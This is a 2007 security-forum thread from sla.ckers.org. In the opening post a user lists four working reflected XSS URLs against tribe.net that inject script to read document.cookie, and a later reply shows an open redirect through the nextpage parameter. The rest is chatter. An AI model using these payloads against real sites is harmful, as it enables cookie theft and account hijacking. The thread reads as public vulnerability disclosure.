Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Tribe.com (Cisco Owned)
Posted by: digi7al64
Date: March 05, 2007 09:28PM

Cisco has decided to join the social networking arena
http://news.com.com/Cisco+buys+into+social-networking+fray/2100-1033_3-6157797.html

To welcome them on the "scene" here is the some reflective xss.
http://search.tribe.net/?page-size=10&query=%22%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://tribe.net/template/pub%2CChangeLocation.vm?nextpage=%22%20style=%22background:%20url(javascript:alert(document.cookie));%22&scrntemp=pub%2CGlobalFind.vm
http://tribe.net/template/pub%2CChangeLocation.vm?nextpage=%22%20src=%22javascript:alert(document.cookie);&scrntemp=pub%2CGlobalFind.vm
http://tribe.net/template/pub%2CChangeLocation.vm?nextpage=%22%20type=input%20STYLE=%22width:%20expression(alert('XSS'));%22&scrntemp=pub%2CGlobalFind.vm

as you can see, most stuff gets through and i can only imagine how "secure" the actual persistent data is. Perhaps i might join!

Ohhh, please post all your tribe spoilts in here. It will be interesting to see how many we can gather.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Tribe.com (Cisco Owned)
Posted by: rsnake
Date: March 06, 2007 04:39PM

I was amazed when I saw this, but then I saw the quote, "[the company] allows large companies to easily add social-networking features to their Web sites without needing to hire a team of engineers from Stanford to do it."

While I'm not a big fan of building social networking sites, I can get on board with not wanting to hire Stanford grads... hahah... just kidding.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Tribe.com (Cisco Owned)
Posted by: tx
Date: March 23, 2007 05:22AM

The nextpage variable in the links works as a weird redirect. If the url is http://www.whatever.tld it will replace 'www' with the name of the city the user clicks (generally) sending the user to http://citysubdomain.whatever.tld. http://wichita.tribe.net/template/pub%2CChangeLocation.vm?nextpage=http://www.tribe.tk&scrntemp=%22pub%2CNotLoggedIn.vm
if the domain is one letter (ie http://x.com) it will simply replace the character (alpha) with the the city name http://wichita.tribe.net/template/pub%2CChangeLocation.vm?nextpage=http://x.org&scrntemp=%22pub%2CNotLoggedIn.vm .

I suppose something like that could have some limited seo value...

EDIT: Actually, the links are javascript, so that kills the seo value.

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 03/23/2007 05:25AM by tx.

Options: ReplyQuote
Re: Tribe.com (Cisco Owned)
Posted by: hackathology
Date: March 30, 2007 03:57AM

hahahhaha, i guess every big cooperation gets XSS. Trust me. You can try it on cisco, microsoft, oracle,etc..you will definitely find XSS. Agree?

http://hackathology.blogspot.com

Options: ReplyQuote


Sorry, only registered users may post in this forum.